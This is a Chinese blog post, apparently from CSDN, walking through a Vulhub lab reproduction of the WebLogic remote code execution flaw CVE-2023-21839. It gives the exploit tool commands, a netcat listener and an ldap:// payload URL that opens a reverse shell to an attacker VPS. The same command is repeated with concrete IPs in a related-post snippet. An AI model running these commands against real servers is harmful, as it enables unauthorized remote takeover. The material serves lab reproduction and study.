CVE-2023-21839:Oracle WebLogic Server RCE

最新推荐文章于 2024-07-25 14:54:35 发布
最新推荐文章于 2024-07-25 14:54:35 发布
阅读量550 收藏 3
点赞数
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45747465/article/details/131595044
版权

CVE-2023-21839允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。

》》》影响版本《《《

  • Weblogic 12.2.1.3.0
  • Weblogic 12.2.1.4.0
  • Weblogic 14.1.1.0.0
一:漏洞复现

步骤一:进入Vulhub对应的目录系下,启动容器并访问靶场...

#启动靶场
cd vulhub/weblogic/CVE-2023-21839
docker-compose build
docker-compose up -d
#访问靶场
http://ip:7001/

步骤二:在VSP上监听8080端口接收反弹过来的Shell并在VPS上运行JNDIExpLoit进行终端...

#端口监听
nc -l 8080

#JNDIExploit项目地址
https://github.com/WhiteHSBG/JNDIExploit

#JNDIExploit执行操作
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip

步骤三:在本地执行以下命令进行攻击

#攻击项目
https://github.com/DXask88MA/Weblogic-CVE-2023-21839

#命令模板
java -jar Weblogic-CVE-2023-21839.jar 目标IP地址:目标端口 ldap://黑客VPS地址:1389/Basic/ReverseShell/黑客VPS地址/监听端口

遇见旎
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3945
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
0xSec
02-11 5347
WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。
CVE-2023-21839 weblogic rce漏洞复现
wutiangui的博客
11-04 1341
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
weixin_45653478的博客
05-14 883
CVE-2023-21839是一个针对Oracle WebLogic Server的远程代码执行漏洞。WebLogic是美国Oracle公司出品的一个Java应用服务器,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用。该漏洞源于WebLogic IIOP/T3协议存在的缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过该协议网络访问并攻击存在安全风险的WebLogic Server
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 801
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar。
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1606
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
weblogic系列所有漏洞复现弱口令、CVE-2023-21839CVE-2018-2894、CVE-2017-10271
qq_47289634的博客
07-05 2189
WebLogic是由Oracle公司开发和提供的一款Java应用服务器。它是一个成熟、可靠且高性能的中间件平台,用于构建、部署和管理企业级Java应用程序。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 7785
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
oracle cve 漏洞,CVE-2020-2555:Oracle WebLogic RCE漏洞分析
weixin_42639246的博客
04-04 528
写在前面的话在对Java Web应用程序进行研究时,不安全的反序列化漏洞现在已经成为了攻击者或研究人员的常见目标了。这些漏洞将导致他人在目标设备上可靠地实现远程代码执行,而且这类漏洞通常很难修复。在这篇文章中,我们将对漏洞CVE-2020-2555(ZDI-20-128)进行分析。这是一个严重漏洞,CVSS评分为9.8,该漏洞将影响Oracle Coherence库,而这个库在Oracle Web...
Weblogic-CVE-2023-21839
Continuejww的博客
12-14 874
RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过远程协议进行远程命令执行,当或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞。
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP...
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
cve-2018-2893-poc
05-07
CVE-2018-2893是一个远程代码执行(RCE)漏洞,主要影响WebLogic Server的T3协议处理。T3是WebLogic Server使用的传输协议,用于客户端与服务器之间的通信。由于在解析T3协议请求时存在缺陷,攻击者可以通过构造恶意...
最新2018年7月WebLogic漏洞(CVE-2018-2893) 适用于weblogic12.2.1.3
07-23
Oracle的高危远程代码执行漏洞(CVE-2018-2893),通过该漏洞攻击者可以在未授权的情况下远程执行任意代码。 受此漏洞影响的版本包括: WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3 ...
WebLogic CVE-2018-2628漏洞
06-13
CVE-2018-2628是一个严重的安全漏洞,该漏洞影响了WebLogic Server的多个版本,可能导致远程代码执行(RCE)攻击,使得恶意攻击者能够在受感染的服务器上执行任意代码,从而对系统造成严重威胁。 在深入探讨CVE-...
视图
qq_61709335的博客
07-24 1196
数据库是由数据库设计员,根据用户的所有需求,按照数据库设计规范设计的,但根据数据库设计规范设计的数据库并不一定符合用户的应用需求。而 SQL SERVER根据不同用户的应用需求,重新定义了表的数据结果,这种结构就是视图。数据库中的视图是一个虚拟表。同真实的表一样,视图包含一系列带有名称的列和行数据,行和列数据用来自由定义视图和查询所引用的表,并且在引用视图时动态产生。
MySQL数据库
最新发布
m0_73949379的博客
07-25 880
Structured Query Language的缩写,及结构化查询语言关系型数据库的标准语言用于维护管理数据库包括数据查询,数据更新,访问控制,对象管理等功能。
mysql常用命令
p_s_p的博客
07-22 1303
mysql常用命令
CVE-2023-21839
08-17
- *1* *3* [CVE-2023-21839Weblogic反序列化漏洞复现](https://blog.csdn.net/weixin_48539059/article/details/130101435)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值